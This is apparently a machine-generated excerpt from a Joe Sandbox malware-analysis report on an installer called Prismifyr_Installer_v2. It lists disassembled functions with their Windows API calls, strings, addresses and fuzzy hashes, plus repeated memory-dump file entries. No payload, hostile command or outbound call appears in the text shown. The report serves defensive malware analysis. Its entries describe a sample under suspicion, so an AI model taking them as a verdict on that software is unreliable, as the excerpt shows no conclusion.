                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          • Opcode ID: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                                                          • Instruction ID: d9fd13ec482603559a9c09f77eb5ae76b99fbdc016b4c624d38ebcad95bf5f4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F61A0CA749D519B78
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                          • Opcode ID: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                                                          • Instruction ID: 65d6ef813479b3ccfd969ec0db039784a4d8c6b5967a53089d3579ec78c560c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 401193736041282ADB00656D9C45F9E369C9B85334F25423BFA65F21D1E979D82582E8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,004DF000,?,76233420,004059EC,?,004DF000,76233420,00000000), ref: 00405C48
                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                          • String ID: C:\
                                                                                                                                                                                                                          • API String ID: 3213498283-3404278061
                                                                                                                                                                                                                          • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                                                                                          • Instruction ID: 75375947fb2108fa8988f35f37760ff259c71c6e50658764317197b9124938a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0BB61908F1199FB3177644C49E7B66BCDB55350B04853FD641B71C0D7F84C818BD9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Enum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 464197530-0
                                                                                                                                                                                                                          • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                          • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                          • Opcode ID: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                                                          • Instruction ID: 9c0cd9c85579b1f1539786df4f617efd254904ce91a486f6a135d178cfad0ab8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF05E30485630EBD6506B20FE0CACB7BA5FB84B41B0149BAF005B11E4D7B85880CBDC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                                            • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                                                          • Instruction ID: 334c9fee3abb3f39d596823d3a3537c7effd0098edc8ca0b3d981ed7cb288a41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9015A31100709ABEB205F51DD94A9B3B26EB84795F20507AFA007A1D1D7BA9C919E2E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,?,00000000,?,?,Remove folder: ,?,?,004063FC,80000002), ref: 004061CE
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\), ref: 004061D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                                                          • String ID: Remove folder:
                                                                                                                                                                                                                          • API String ID: 3356406503-1958208860
                                                                                                                                                                                                                          • Opcode ID: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                                                          • Instruction ID: 8659262355d6ebf2290daf59b07b2549fc881bd87fa0bb5ea6267207f8cb0b09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caab4bc250bb6a278ef1a8ac262e6d4f4be946af9bdb02c3b8c6b2633afb5ee1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68017C72500209EADF218F51DD09EDB3BB8EF55364F01403AFE16A61A1D378DA64EBA4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00468250,Error launching installer), ref: 004058CC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                                                          • Instruction ID: 30392a530fa928b09b8412afc6dc4f2cd20664ca8a9f97139eafb5a2ce14b88a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fdd641d1b9510881a379fce0cbff5cab58f1c092c5a17148380fd449a2e826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E09AB5540609BFEB009B64DD05F7B77ACEB04708F508565BD51F2150EB749C148A79
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
